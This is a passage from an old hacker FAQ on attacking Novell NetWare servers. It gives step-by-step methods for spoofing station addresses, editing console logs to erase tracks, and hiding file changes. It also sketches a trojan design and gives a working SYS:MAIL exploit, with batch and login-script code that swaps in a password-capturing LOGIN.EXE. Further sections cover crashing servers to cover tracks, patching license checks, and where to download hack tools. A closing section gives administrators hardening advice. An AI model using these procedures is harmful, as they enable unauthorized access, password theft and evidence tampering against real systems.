  782. if you are using NDIS drivers you will have to add the line to a
  783. PROTOCOL.INI or IBMENII.NIF file, which usually has the lines already in it.
  784.  
  785. For an IP address, you may have to run a TCPIP config program to make it
  786. work (it depends on whose IP stack you are running). Some implementations
  787. will have the mask, the default router and the IP address in the NET.CFG,
  788. some in the TCPIP.CFG. It is a good idea to look around in all network-
  789. related subdirectories to see if there are any .CFG, .INI, or .NIF files
  790. that may contain addresses.
  791.  
  792. Getting the target node address should be pretty easy. Login with any
  793. account and do a USERLIST /A. This will list all accounts currently logged
  794. in with their network and node address. If your workstation is on the same
  795. network as the target, you can spoof the address no problem. Actually you
  796. can spoof the address regardless but to defeat station restrictions you
  797. must be on the same network.
  798.  
  799. ---------------------------------------------------------------------------
  800.  
  801. 02-6. How do I defeat console logging?
  802.  
  803. Here you need console and Supervisor access. The site is running 3.11 or
  804. higher and running the CONLOG.NLM. Any site running this is trapping all
  805. console messages to a file. If you run SETPWD at the console, the response
  806. by SETPWD is written to a log file. Here's the steps for determining if it
  807. is running and what to do to defeat it:
  808.  
  809.  - Type MODULES at the console. Look for the CONLOG.NLM. If it's there, it's
  810. running.
  811.  
  812.  - Look on the server in SYS:ETC for a file called CONSOLE.LOG. This is a
  813. plain text file that you can type out. However you cannot delete or edit it
  814. while CONLOG is running.
  815.  
  816.  - Unload CONLOG at the console.
  817.  
  818.  - Delete, or even better yet, edit the CONSOLE.LOG file, erasing your tracks.
  819.  
  820.  - Reload CONLOG. It will show that is has been restarted in the log.
  821.  
  822.  - Check the CONSOLE.LOG file to ensure the owner has not changed.
  823.  
  824.  - Run PURGE in the SYS:ETC directory to purge old versions of CONSOLE.LOG
  825. that your editor have left to be salvaged.
  826.  
  827. ---------------------------------------------------------------------------
  828. ---------------------------------------------------------------------------
  829.  
  830. Section 03
  831.  
  832. File and Directory Access
  833.  
  834. ---------------------------------------------------------------------------
  835.  
  836. 03-1. How can I see hidden files and directories?
  837.  
  838. Instead of a normal DIR command, use NDIR to see hidden files and
  839. directories. NDIR *.* /S /H will show you just Hidden and System files.
  840.  
  841. ---------------------------------------------------------------------------
  842.  
  843. 03-2. How do I defeat the execute-only flag?
  844.  
  845. If a file is flagged as execute-only, it can still be opened. Open the file
  846. with a program that will read in executables, and do a Save As to another
  847. location.
  848.  
  849. Also try X-AWAY.EXE to remove this flag since Novell's FLAG.EXE won't. But
  850. once again X-AWAY.EXE requires Supervisor access.
  851.  
  852. ---------------------------------------------------------------------------
  853.  
  854. 03-3. How can I hide my presence after altering files?
  855.  
  856. The best way is to use Filer. Here are the steps for removing file
  857. alterations -
  858.  
  859.  - Run Filer or use NDIR and note the attributes of the target file, namely
  860. the date and owner of the file.
  861.  
  862.  - Make your changes or access the file.
  863.  
  864.  - Run Filer or use NDIR and check to see if the attributes have changed. If
  865. so, change them back to the original settings.
  866.  
  867. While you can hit F1 will in Filer and get all the context-sensitive help
  868. you need, the quicky way to get where you're going is to run Filer in the
  869. target file's directory, select Directory Contents, highlight the target
  870. file and hit enter, select File Options and then View/Set File Information.
  871. View and edit to your heart's desire.
  872.  
  873. ---------------------------------------------------------------------------
  874.  
  875. 03-4. What is a Netware-aware trojan?
  876.  
  877. A Netware-aware trojan is a program that supposedly does one thing but does
  878. another instead, and does it using Netware API calls. I have never personally
  879. encountered one, but here is how they would work.
  880.  
  881.  - Trojan program is placed on a workstation, hopefully on one frequented
  882. by admins with Supe rights. The trojan program could be named something like
  883. CHKVOL.COM or VOLINFO.COM, that is a real name but with a .COM extension.
  884. They would be placed in the workstation's path.
  885.  
  886.  - Once executed, the trojan uses API calls to determine if the person is
  887. logged in as a Supe equivalent, if not it goes to the next step. Otherwise
  888. some type of action to breach security is performed.
  889.  
  890.  - The real CHKVOL.EXE or VOLINFO.EXE is ran.
  891.  
  892. The breach of security would typically be some type of command-line activity
  893. that could be performed by system() calls. For example, PROP.EXE could be
  894. run to build a property and the replacement LOGIN.EXE copied up to the
  895. server in the SYS:LOGIN directory. Or RW access granted to the SYS:SYSTEM
  896. directory for a non-Supe user like GUEST.
  897.  
  898. Once activated the trojan could also erase itself since it is no longer
  899. needed.
  900.  
  901. ---------------------------------------------------------------------------
  902.  
  903. 03-5. What are Trustee Directory Assignments?
  904.  
  905. The LAN God has pointed out quite correctly that Trustee Directory Assignments
  906. are the most misunderstood and misconfigured portion of Novell Netware. Typically
  907. a secure site should have Read and File Scan only in most directories, and
  908. should not have any rights on the root directory of any volume. Rights assigned
  909. via the Trustee Directory Assignments filter down the directory tree, so if a
  910. user has Write access at the root directory, that user has Write access in every 
  911. subdirectory below it (unless explicitly limited in a subdirectory down stream).
  912. And these assignments are not located in the bindery, but on each volume.
  913.  
  914. The following is a brief description of Trustees and Trustee Directory
  915. Assignments cut and pasted from the unofficial comp.os.netware.security FAQ:
  916.  
  917. [quote]
  918. A trustee is any user or group that has been granted access rights in a 
  919. directory.
  920.  
  921. The access rights in Novell NetWare 2 are slightly different from the ones in
  922. NetWare 3.
  923.  
  924. The following is a summary of access rights for NetWare 3.
  925.  
  926. S - Supervisory. Any user with supervisory rights in a directory will
  927. automatically inherit all other rights, regardless of whether they have been 
  928. explicitly granted or not. Supervisor equivalent accounts will hold this access 
  929. right in every directory.
  930.  
  931. R - Read. Enables users to read files.
  932.  
  933. C - Create. Enables users to create files and directories. Unless they also have 
  934. write access, they will not be able to edit files which have been created.
  935.  
  936. W - Write. Enables users to make changes to files. Unless they also have create 
  937. access, they may not be able to edit files, since the write operation can only be 
  938. used to extend files (not truncate them, which file editors need to do).
  939.  
  940. E - Erase. Enable users to erase files and remove directories.
  941.  
  942. M - Modify. Enable users to modify file attributes.
  943.  
  944. F - File scan. Enables users to see file and directory information. If a user 
  945. does not have file scan rights, they will not see any evidence of such files 
  946. existing.
  947.  
  948. A - Access control. Enable user to change trustee rights. They will be able to 
  949. add other users as trustees, remove trustees, and grant/revoke specific rights 
  950. from users. The only caveat of access control is that it is possible for users to 
  951. remove themselves (as trustees) from directories, thus losing all access control.
  952.  
  953. In addition to trustees and access rights, there is a concept of inherited rights 
  954. which means that users inherit rights from parent directories. For example, if 
  955. user ALICE has rights [CWEM] in a directory, and she has [RF] rights in the 
  956. parent directory then she will have [RCWEMF] rights as a result of the inherited 
  957. rights. This will only work if one of the rights that ALICE has in the two 
  958. directories is granted to a group; if both are granted to her, she will lose the 
  959. rights of the parent.
  960. [end quote]
  961.  
  962. ---------------------------------------------------------------------------
  963.  
  964. 03-6. Are there any default Trustee Assignments that can be exploited?
  965.  
  966. Yes. By default the group EVERYONE has Create rights in SYS:MAIL. This
  967. means the user (including GUEST) has the ability to write files to any
  968. subdirectory in SYS:MAIL. The first versions of Netware included a simple
  969. e-mail package, and every user that is created gets a subdirectory in
  970. mail with RCWEMF, named after their object ID number. One consistent 
  971. number is the number 1, which is always assigned to Supervisor. Here's
  972. one way to exploit it:
  973.  
  974. - Login as GUEST and change to the SYS:MAIL subdirectory.
  975.  
  976. - Type DIR. You will see one subdirectory, the one owned by GUEST. Change
  977. into that directory (ex. here is C0003043)
  978.  
  979. - Type DIR. If there is no file named LOGIN, you can bet there may not be
  980. one for Supervisor. If there is a default-looking LOGIN file, even a zero 
  981. length file, you cannot proceed.
  982.  
  983. - Copy PROP.EXE and LOGIN.EXE (the itsme version) to SYS:MAIL\C0003043
  984.  
  985. - Create a batch file (ex. here is BOMB.BAT) with the following entries:
  986.  
  987.   @ECHO OFF
  988.   FLAG \LOGIN\LOGIN.EXE N > NUL
  989.   COPY \MAIL\C0003043\LOGIN.EXE \LOGIN\LOGIN.EXE > NUL
  990.   FLAG \LOGIN\LOGIN.EXE SRO > NUL
  991.   \MAIL\C0003043\PROP -C > NUL
  992.  
  993. - Create a LOGIN file with the following entries:
  994.  
  995.   MAP DISPLAY OFF
  996.   MAP ERRORS OFF
  997.   MAP G:=SYS:
  998.   DRIVE G:
  999.   COMMAND /C #\MAIL\1\BOMB
  1000.   DRIVE F:
  1001.   MAP DELETE G:
  1002.  
  1003. - Now copy the files to the Supervisor's SYS:MAIL directory from a drive
  1004. mapped to the SYS: volume.
  1005.  
  1006. TYPE BOMB.BAT > \MAIL\1\BOMB.BAT
  1007. TYPE LOGIN > \MAIL\1\LOGIN
  1008.  
  1009. - The next time the Supervisor logs in the LOGIN.EXE is replaced and the
  1010. PROP.EXE file is run, capturing passwords. Run PROP.EXE later to get the
  1011. passwords, and then once you have all the passwords you need (including
  1012. Supervisor) delete your LOGIN and BOMB.BAT file. 
  1013.  
  1014. Admins can defeat this by creating default personal Login Scripts or by
  1015. adding an EXIT command to the end of the System Login Script. Later versions
  1016. of Netware create a zero-length LOGIN file at ID creation time in the 
  1017. SYS:MAIL directories to defeat this.
  1018.  
  1019. ---------------------------------------------------------------------------
  1020. ---------------------------------------------------------------------------
  1021.  
  1022. Section 04
  1023.  
  1024. Miscellaneous Info on Netware
  1025.  
  1026. ---------------------------------------------------------------------------
  1027.  
  1028. 04-1. Why can't I get through the 3.x server to another network via TCP/IP?
  1029.  
  1030. Loading the TCPIP.NLM in a server with two cards does not mean that packets
  1031. will be forwarded from one card to another. For packet forwarding to work, the
  1032. AUTOEXEC.NCF file should have the line:
  1033.  
  1034. load tcpip forward=yes
  1035.  
  1036. For packets to go through the server, you must set up a "gateway=aa.bb.cc.dd" 
  1037. option on the workstation. This leaves routing up to the server. If you are 
  1038. writing hack tools, keep this in mind if they use IP. Some older routers may
  1039. not recognize the Netware server as a router, so you may not have many options
  1040. if your target is on the other side of one of these routers. Newer routers are
  1041. Netware aware and will "find" your server as a router through RIP.
  1042.  
  1043. Netware 3.11 IP will only forward between two different subnets. Proxy Arp is 
  1044. currently not supported in Netware IP. Example:
  1045.  
  1046. 123.45.6 & 123.45.7 with a mask of ff.ff.ff.00 will forward packets
  1047.  
  1048. 123.45.6 & 231.45.7 with a mask of ff.ff.ff.00 will not
  1049.  
  1050. This way you do not waste precious time trying to cross an uncrossable river.
  1051. Some admins use this to limit the flow of IP traffic.
  1052.  
  1053. ---------------------------------------------------------------------------
  1054.  
  1055. 04-2. How can I boot my server without running STARTUP.NCF/AUTOEXEC.NCF?
  1056.  
  1057. For Netware 3.xx, use these command-line options:
  1058.  
  1059. SERVER -NS to skip STARTUP.NCF, and
  1060.  
  1061. SERVER -NA to skip AUTOEXEC.NCF
  1062.  
  1063. NetWare 2.x does not HAVE the files STARTUP.NCF and AUTOEXEC.NCF. Instead they
  1064. hard-code all the information into NET$OS.EXE, so you will have to rebuild it
  1065. to change anything.
  1066.  
  1067. ---------------------------------------------------------------------------
  1068.  
  1069. 04-3. How can I login without running the System Login Script?
  1070.  
  1071. Often an admin will try and prevent a user from getting to DOS or breaking
  1072. out of the System Login Script to "control" the user. Here's to way to
  1073. prevent that -
  1074.  
  1075.  - Use ATTACH instead of LOGIN to connect to a server. ATTACH will not run
  1076. the login script, whereas LOGIN will. ATTACH.EXE will either have to be
  1077. copied to a local HD or put in SYS:LOGIN.
  1078.  - Use the /s <fname> option for LOGIN. Using "LOGIN /S NUL <login>" will
  1079. cause LOGIN to load the DOS device NUL which will always seem like an empty
  1080. file.
  1081.  
  1082. ---------------------------------------------------------------------------
  1083.  
  1084. 04-4. How do I remotely reboot a Netware 3.x file server?
  1085.  
  1086. If you have access to a server via RCONSOLE it may come in handy after
  1087. loading or unloading an NLM to reboot a server. Build an NCF file by
  1088. doing the following steps -
  1089.  
  1090.  - Create a file called DOWNBOY.NCF on your local drive. It should be
  1091. a text file and contain the following lines:
  1092.  
  1093.     REMOVE DOS
  1094.     DOWN
  1095.     EXIT
  1096.  
  1097.  - Copy up the file to the SYS:SYSTEM directory using RCONSOLE.
  1098.  
  1099.  - At the System Console prompt, type DOWNBOY and enter.
  1100.  
  1101. What happens is this - the REMOVE DOS statement frees up the DOS section
  1102. in server RAM, the server is downed (if there are open files, you will
  1103. be given one of those "are you sure" messages, answer Y for yes), and
  1104. the EXIT command tries to return the server console to DOS. But since
  1105. you removed DOS from RAM, the server is warm booted.
  1106.  
  1107. ---------------------------------------------------------------------------
  1108.  
  1109. 04-5. How can I abend a Netware server? And why?
  1110.  
  1111. I'll answer the second question first. You may be testing your server as an
  1112. administrator and wish to see how you are recovering from crashes. Or you
  1113. may be a hacker and wish to cover your tracks VERY DRAMATICALLY. After all,
  1114. if you are editing log files and they are going to look funny when you are
  1115. done, a good crash might explain why things look so odd in the logs.
  1116.  
  1117. These are per itsme:
  1118.  
  1119. - Netware 4.1 : type 512 chars on the console + NENTER -> abend
  1120. - Netware 3.11 : NCP request 0x17-subfn 0xeb with a connection number higher
  1121.   than the maximum allowed will crash the server (yes you will need the APIs)
  1122.  
  1123. ---------------------------------------------------------------------------
  1124.  
  1125. 04-6. What is interesting about Netware 4.x's licensing?
  1126.  
  1127. It is possible to load multiple licenses and combine their total number of
  1128. users. For example, if you are in one of those Novell CNE classes where they 
  1129. give you a 2 user 4.1 license, you can get everyone's CD in class and combine 
  1130. them on one server. If you get 10 CDs you have a 20 user license. I know of no 
  1131. limit to the maximum number of licenses and user limit, except for hardware 
  1132. limitations supporting it. This means you could load more than one copy of
  1133. 1000 user Netware 4.1 on a server (assuming you have unique copies, not the
  1134. same copy twice).
  1135.  
  1136. itsme has done some poking around with his tools, and has the following to say
  1137. regarding the SERVER.EXE that comes with Netware 4: 
  1138.  
  1139.  what's inside server.exe:
  1140.  0001d7c7  server.nlm          type=07
  1141.  000d319d  "Link" 000d504a
  1142.  000d31a5  unicode.nlm         type=00  (ordinary NLM)
  1143.  000d504a  "Link" 000d6e9c
  1144.  000d5052  dsloader.nlm        type=00  (ordinary NLM)
  1145.  000d6e9c  "Link" 000db808
  1146.  000d6ea4  timesync.nlm        type=00  (ordinary NLM)
  1147.  000db808  polimgr.nlm         type=0c  ('hidden' NLM)
  1148.    by editing the binary of server, and changing the type of polimgr.nlm
  1149.    from 0c to 00  (offset 007a or 000db882 in server.exe)
  1150.    it becomes unhidden.
  1151.    hidden NLM's are protected from debugging with the netware debugger.
  1152.  
  1153.    polimgr.nlm  manages the license files, after it reads the file,
  1154.    it checks with somekind of signature function whether it is a valid file
  1155.    the function doing the checking can be made to always return OK, then
  1156.    you can create an any number of users license.
  1157.  
  1158. ---------------------------------------------------------------------------
  1159. ---------------------------------------------------------------------------
  1160.  
  1161. Section 05
  1162.  
  1163. Resources
  1164.  
  1165. ---------------------------------------------------------------------------
  1166.  
  1167. 05-1. What are some Netware FTP locations?
  1168.  
  1169. These are from various FAQs. I have not checked all of these and I'm pretty
  1170. sure some may no longer be up. But here's a starting point.
  1171.  
  1172. Novell's ftp site:
  1173.  
  1174. ftp.novell.com                                  137.65.4.1
  1175. ftp.novell.de                                   193.97.1.1
  1176.  
  1177. Novell's ftp Mirrors:
  1178.  
  1179. netlab2.usu.edu                                 129.123.1.44 (the best)
  1180. bnug.proteon.com                                128.185.17.201
  1181. bnug.harvard.edu                                128.103.85.201
  1182. ftp.rug.nl              /networks/novell        129.125.4.15
  1183. ftp.salford.ac.uk       /novell                 146.87.255.21
  1184. tui.lincoln.ac.nz       /novell/novlib          138.75.90.4
  1185. novell.nrc.ca           /netwire                132.246.160.4
  1186.  
  1187. Other Misc. Sites:
  1188.  
  1189. ml0.ucs.ed.ac.uk        /guest/pc               129.215.112.49 (second best)
  1190. splicer2.cba.hawaii.edu /files/novell           128.171.17.2
  1191.             /files/pegasus
  1192. cc.usu.edu              /slip                   129.123.1.1
  1193.             /tcp-ip
  1194. risc.ua.edu             /pub/network/novlib     130.160.4.7
  1195.             /pub/network/pegasus
  1196.             /pub/network/misc
  1197.             /pub/network/tcpip
  1198. wuarchive.wustl.edu     /etc/system/novell      128.252.135.4
  1199. nctuccca.edu.tw                                 140.111.1.10
  1200. ftp.uni-kl.de           /pub/novell             131.246.9.95
  1201. netlab.usu.edu          /novell                 129.123.1.11
  1202.             /netwatch
  1203. chaos.cc.ncsu.edu       /pc/novell              152.1.19.23
  1204.             /pc/utils
  1205.             /pc/email
  1206.             /pc/net
  1207.             /pc/manage
  1208. dutiws.twi.tudelft.nl   /pub/novell             130.161.156.11
  1209. jumper.mcc.ac.uk        /pub/security/netware
  1210.  
  1211. ---------------------------------------------------------------------------
  1212.  
  1213. 05-2. Can I get files without FTP?
  1214.  
  1215. Try using the BITFTP-FTP/Email gateway. Just send e-mail containing HELP as
  1216. the BODY (not a subject) to BITFTP@PUCC.BITNET. It will send more info to
  1217. you.
  1218.  
  1219. Internet gateways are:
  1220.  
  1221. ftpmail@decwrl.dec.com
  1222.  
  1223. ftpmail@cs.uow.edu.au
  1224.  
  1225. If you are on Compuserve, type GO NETWIRE to get to Novell's forum. There are
  1226. files on there for downloading. Also try the CD NSEpro, which is most of the
  1227. Netwire forum put on CD.
  1228.  
  1229. ---------------------------------------------------------------------------
  1230.  
  1231. 05-3. What are some Netware WWW locations?
  1232.  
  1233. http://www.novell.com/                                  Novell in Provo
  1234. http://www.novell.de/                                   Novell in Europe
  1235. http://www.netware.com/                                 Novell propaganda site
  1236. http://www.salford.ac.uk/ais/Network/Novell-Faq.html    Novell@listserv.syr.edu
  1237. http://mft.ucs.ed.ac.uk/novell/techsup/techsup.htm      Edinburg Tech Library*
  1238. http://fastlane.net/homepages/thegnome                  My home page         
  1239. http://resudox.net/bio/mainpage.html                    Small tool collection
  1240. http://www.efs.mq.edu.au/novell/faq                     comp.sys.novell FAQ
  1241. http://www.cis.ohio-state.edu/hypertext/faq/usenet/netware/security/faq.html
  1242.                            comp.os.netware.security FAQ
  1243.  
  1244. *Excellent site for tons of techie info. The Netware Server Management 
  1245. section should be read be all hackers and admins alike.
  1246.  
  1247. ---------------------------------------------------------------------------
  1248.  
  1249. 05-4. What are some Netware USENET groups?
  1250.  
  1251.     comp.os.netware.misc. (main group, replaced comp.sys.novell)
  1252.     comp.os.netware.announce (moderated announcements)
  1253.     comp.os.netware.security (security issues)
  1254.     comp.os.netware.connectivity (connect. issues incl. LAN Workplace)
  1255.  
  1256. ---------------------------------------------------------------------------
  1257.  
  1258. 05-5. What are some Netware mailing lists?
  1259.  
  1260. *  NOVELL@listserv.syr.edu - send an email with no subject to
  1261. listserv@listserv.syr.edu with "subscribe NOVELL Your Full Name" in the body.
  1262. You must reply to the message within two days or you'll not be added to the
  1263. list. The same address no subject with "unsubscribe NOVELL" takes you off the
  1264. list.
  1265.  
  1266. *  BIG-LAN@suvm.acs.syr.edu - send subscriptions to LISTSERV@suvm.acs.syr.edu.
  1267.  
  1268. *  CUTCP-L@nstn.ns.ca for a discussion of Charon and CUTCP Telnet issues. Send
  1269. subscription requests to listserv@nstn.ns.ca.
  1270.  
  1271. *  INFO-IBMPC@arl.army.mil - send subscription requests to 
  1272. INFO-IBMPC-REQUEST@arl.army.mil.
  1273.  
  1274. *  PMAIL@ua1vm.ua.edu for discussion of Pegasus Mail. The author, David Harris,
  1275. is active on this list. Send subscription and other administrative requests to
  1276. listserv@ua1vm.ua.edu.
  1277.  
  1278. *  NWP@UEL.AC.UK for programming under Netware. Send subscription requests to
  1279. LISTPROC@UEL.AC.UK.
  1280.  
  1281. *  MSDOS-ANN@tacom-emh1.army.mil for announcements of SimTel uploads. To
  1282. subscribe, send mail to LISTSERV@tacom-emh1.army.mil with the message
  1283. SUBSCRIBE MSDOS-ANN.
  1284.  
  1285. *  Garbo-Ann@Garbo.uwasa.fi for announcements of Garbo uploads. To subscribe,
  1286. send mail to Majordomo@Garbo.uwasa.fi with the message SUBSCRIBE GARBO-ANN
  1287. <firstname> <lastname>.
  1288.  
  1289. *  CICA-L@ubvm.cc.buffalo.edu for announcements of Windows uploads to CICA. To
  1290. subscribe, send mail to Listserv@ubvm.cc.buffalo.edu with the message SUBSCRIBE
  1291. CICA-L <firstname> <lastname>.
  1292.  
  1293. ---------------------------------------------------------------------------
  1294.  
  1295. 05-5. Where can I get the files mentioned in this FAQ?
  1296.  
  1297. SETPWD.NLM   - m10.ucs.ed.ac.uk    /guest/pc/novell/nlms   setpwd.zip 
  1298. SETSPWD.NLM  - netlab2.usu.edu     /misc 
  1299. SETSPASS.NLM - netlab2.usu.edu     /misc
  1300. NOVELBFH.EXE - jumper.mcc.ac.uk    /pub/security/netware novelbfh.zip
  1301. KNOCK.EXE    - jumper.mcc.ac.uk    /pub/security/netware    knock.zip
  1302. LOGIN.EXE    - jumper.mcc.ac.uk    /pub/security/netware      nwl.zip
  1303. PROP.EXE     - jumper.mcc.ac.uk    /pub/security/netware      nwl.zip
  1304. CHKNULL.EXE  - jumper.mcc.ac.uk    /pub/security/netware     chk0.zip
  1305. USERLST.EXE  - m10.ucs.ed.ac.uk    /guest/pc/novell/utils jrb212a.zip
  1306. LASTHOPE.NLM - m10.ucs.ed.ac.uk    /guest/pc/novell/nlms lasthope.zip
  1307. NW-HACK.EXE  - jumper.mcc.ac.uk    /pub/security/netware  nw-hack.zip
  1308. SUPER.EXE    - m10.ucs.ed.ac.uk    /guest/pc/novell/utils   super.zip
  1309. CONLOG.NLM   - m10.ucs.ed.ac.uk    /guest/pc/novell
  1310. X-AWAY.EXE   - m10.ucs.ed.ac.uk    /guest/pc/novell/utils  x-away.zip
  1311. Bindview     - Your local software dealer
  1312. GRPLIST.EXE  - m10.ucs.ed.ac.uk    /guest/pc/novell/utils jrb212a.zip
  1313. GETEQUIV.EXE - m10.ucs.ed.ac.uk    /guest/pc/novell/utils jrb212a.zip
  1314. TRSTLIST.EXE - m10.ucs.ed.ac.uk    /guest/pc/novell/utils jrb212a.zip
  1315. SECUREFX.NLM - www.novell.com      Search for it in the Tech Section
  1316. RCON.FAQ     - jumper.mcc.ac.uk    /pub/security/netware     rcon.faq
  1317.  
  1318.  
  1319. ---------------------------------------------------------------------------
  1320.  
  1321. 05-6. What are some good books for Netware?
  1322.  
  1323. For Netware basics, there are tons. Bill Lawrence has a number of books
  1324. that are easy to read but cover things with enough detail for a good
  1325. understanding. I recommend the latest stuff from him. Look in your local
  1326. bookstore's techie section. The Novell Press books are also good, but you
  1327. tend to pay more for the name.
  1328.  
  1329. For programming, quoted from my home page:
  1330.  
  1331. Programmer's Guide to Netware -- (1990) Author: Charles G. Rose. Publisher:
  1332. McGraw-Hill, Inc. The bible of Netware programming, dated since Novell has 
  1333. changed virtually every header file, but still the best. Covers 2.x and 3.x
  1334. except for NLM programming. Lots of good source code.
  1335.  
  1336. Netware Programmer's Guide -- (1990) Author: John T. McCann. Publisher: M&T
  1337. Books. Another dated but classic book with lots of good source for learning.
  1338.  
  1339. Novell 4.0 NLM Programming -- (1993) Authors: Michael Day, Michael Koontz,
  1340. Daniel Marshall. Publisher: Sybex, Inc. Not as complete as I would like, but
  1341. I'm picky. Still a classic. Although the title implies 4.x, most of it still
  1342. works for 3.x, too. And if you can't get the kids to sleep, try reading them 
  1343. the tons of useful source code. Jeez, you may have to leave the closet light
  1344. on, though...
  1345.  
  1346. ---------------------------------------------------------------------------
  1347. ---------------------------------------------------------------------------
  1348.  
  1349. Section 06
  1350.  
  1351. Netware APIs
  1352.  
  1353. ---------------------------------------------------------------------------
  1354.  
  1355. 06-1. Where can I get the Netware APIs?
  1356.  
  1357. Stateside call 1-800-RED-WORD, it's $50 USD, and includes a 2-user license
  1358. of Netware 4.1. Most brand-name compilers will work, but if you're writing
  1359. NLMs you'll need Watcom's latest. It's the only one I know of that will do
  1360. NLM linking.
  1361.  
  1362. ---------------------------------------------------------------------------
  1363. ---------------------------------------------------------------------------
  1364.  
  1365. Section 07
  1366.  
  1367. For Administrators Only
  1368.  
  1369. ---------------------------------------------------------------------------
  1370.  
  1371. 07-1. How do I secure my server?
  1372.  
  1373. This question is asked by administrators, and I'm sure no hackers will read
  1374. this info and learn what you admins might do to thwart hack attacks ;-)
  1375.  
  1376. One thing to keep in mind, most compromises of data occur from an employee
  1377. of the company, not an outside element. They may wish to access sensitive
  1378. personnel files, copy and sell company secrets, be disgruntled and wish to
  1379. cause harm, or break in for kicks or bragging rights. So trust no one.
  1380.  
  1381. Physically Secure The Server -
  1382. ------------------------------
  1383.  
  1384. This is the simplest one. Keep the server under lock and key. If the server
  1385. is at a site where there is a data center (mainframes, midranges, etc) put it
  1386. in the same room and treat it like the big boxes. Access to the server's room
  1387. should be controlled minimally by key access, preferably by some type of key
  1388. card access which can be tracked. In large shops, a man trap (humanoid that
  1389. guards the room) should be in place.
  1390.  
  1391. If the server has a door with a lock, lock it (some larger servers have this)
  1392. and limit access to the key. This will secure the floppy drive. One paranoid
  1393. site I know of keeps the monitor and CPU behind glass, so that the keyboard
  1394. and floppy drive cannot be accessed by the same person at the same time.
  1395.  
  1396. If you only load NLMs from the SYS:SYSTEM directory, use the SECURE CONSOLE
  1397. command to prevent NLMs being loaded from the floppy or other location.
  1398.  
  1399. A hacker could load a floppy into the drive and run one of several utility
  1400. files to gain access to the server. Or they could steal a backup tape or just
  1401. power off the server! By physically securing the server, you can control who
  1402. has access to the server room, who has access to the floppy drive, backup
  1403. tapes, and the System Console. This step alone will eliminate 75% of attack
  1404. potential.
  1405.  
  1406. Secure Important Files -
  1407. ------------------------
  1408.  
  1409. These should be stored offline. You should make copies of the STARTUP.NCF and
  1410. AUTOEXEC.NCF files. The bindery or NDS files should be backed up and stored
  1411. offsite. All System Login Scripts, Container Scripts, and any robotic or
  1412. non-human personal Login Scripts should be copied offline. A robotic or
  1413. non-human account would be an account used by an email gateway, backup
  1414. machine, etc.
  1415.  
  1416. Compile a list of NLMs and their version numbers, and a list of files from
  1417. the SYS:LOGIN, SYS:PUBLIC, and SYS:SYSTEM directories.
  1418.  
  1419. You should periodically check these files against the originals to ensure
  1420. none have been altered.
  1421.  
  1422. Replacing the files with different ones (like using itsme's LOGIN.EXE
  1423. instead of Novell's) will give the hacker access to the entire server. It is
  1424. also possible that the hacker will alter .NCF or Login Scripts to bypass
  1425. security or to open holes for later attacks.
  1426.  
  1427. Make a list of Users and their accesses -
  1428. -----------------------------------------
  1429.  
  1430. Use a tool like Bindview or GRPLIST.EXE from the JRB Utilities to get a list
  1431. of users and groups (including group membership). Once again, keep this
  1432. updated and check it frequently against the actual list.
  1433.  
  1434. Also run Security (from the SYS:SYSTEM directory) or GETEQUIV.EXE from the
  1435. JRB Utilities to determine who has Supervisor access. Look for odd accounts
  1436. with Supervisor access like GUEST or PRINTER.
  1437.  
  1438. It is also a good idea to look at Trustee Assignments and make sure access is
  1439. at a minimum. Check your run from Security to see if access is too great in
  1440. any areas, or run TRSTLIST from the JRB Utilities.
  1441.  
  1442. Security will turn up some odd errors if SUPER.EXE has been run. If you are
  1443. not using SUPER.EXE, delete and rebuild any odd accounts with odd errors
  1444. related to the Bindery, particularly if BINDFIX doesn't fix them yet the
  1445. account seems to work okay. If a hacker put in a backdoor using SUPER.EXE,
  1446. they could get in and perhaps leave other ways in.
  1447.  
  1448. Monitor the Console -
  1449. ---------------------
  1450.  
  1451. Use the CONLOG.NLM to track the server console activity. This is an excellent
  1452. diagnostic tool since error messages tend to roll off the screen. It will
  1453. not track what was typed in at the console, but the system's responses will
  1454. be put in SYS:ETC\CONSOLE.LOG. When checking the console, hit the up arrow
  1455. to show what commands were last typed in.
  1456.  
  1457. While this won't work in large shops or shops with forgetful users, consider
  1458. using the SECUREFX.NLM (or SECUREFX.VAP for 2.x). This sometimes annoying
  1459. utility displays the following message on the console and to all the users
  1460. after a security breach:
  1461.  
  1462. "Security breach against station <connection number> DETECTED."
  1463.  
  1464. This will also be written to an error log. The following message is also
  1465. written the the log and to the console:
  1466.  
  1467. "Connection TERMINATED to prevent security compromise"
  1468.  
  1469. Turn on Accounting -
  1470. --------------------
  1471.  
  1472. Once Accounting is turned on, you can track every login and logout to the
  1473. server, including failed attempts.
  1474.  
  1475. Don't Use the Supervisor Account -
  1476. ----------------------------------
  1477.  
  1478. Leaving the Supervisor logged in is an invitation to disaster. If packet
  1479. signature is not being used, someone could use HACK.EXE and gain access to the
  1480. server as Supervisor. HACK spoofs packets to make them look like they came from
  1481. the Supervisor to add Supe equivalence to other users.
  1482.  
  1483. Also, it implies a machine is logged in somewhere as Supervisor, if it has been
  1484. logged in for more than 8 hours chances are it may be unattended.
  1485.  
  1486. Use Packet Signature -
  1487. ----------------------
  1488.  
  1489. To prevent packet spoofing (i.e. HACK.EXE) enforce packet signature. Add the
  1490. following line to your AUTOEXEC.NCF -
  1491.  
  1492. SET NCP PACKET SIGNATURE OPTION=3
  1493.  
  1494. This forces packet signature to be used. Clients that do not support packet
  1495. signature will not be able to access, so they will need to be upgraded if you
  1496. have any of these clients.
  1497.  
  1498. Use RCONSOLE Sparingly (or not at all) -
  1499. ----------------------------------------
  1500.  
  1501. When using RCONSOLE you are subject to a packet sniffer getting the packets
  1502. and getting the password. While this is normally above the average user's
  1503. expertise, DOS-based programs that put the network interface card into 
  1504. promiscuous mode and capture every packet on the wire are readily available
  1505. on the Internet. The encryption method is not foolproof.
  1506.  
  1507. Remember you cannot "detect" a sniffer in use on the wire.
  1508.  
  1509. Do NOT use a switch to limit the RCONSOLE password to just the Supervisor
  1510. password. All you have done is set the password equal to the switch. If
  1511. you use the line "LOAD REMOTE /P=", Supervisor's password will get in (it
  1512. ALWAYS does) and the RCONSOLE password is now "/P=". Since the RCONSOLE
  1513. password will be in plain text in the AUTOEXEC.NCF file, to help secure
  1514. it try adding a non-printing character or a space to the end of the 
  1515. password.
  1516.  
  1517. Move the AUTOEXEC.NCF to a more secure location (3.x and above) -
  1518. -----------------------------------------------------------------
  1519.  
  1520. Put your AUTOEXEC.NCF file in the same location as the SERVER.EXE file. If a
  1521. server is compromised in that access to the SYS:SYSTEM directory is available
  1522. to an unauthorized user, you will at least have protected the AUTOEXEC.NCF
  1523. file. 
  1524.  
  1525. A simple trick you can do is "bait" a potential hacker by keeping a false
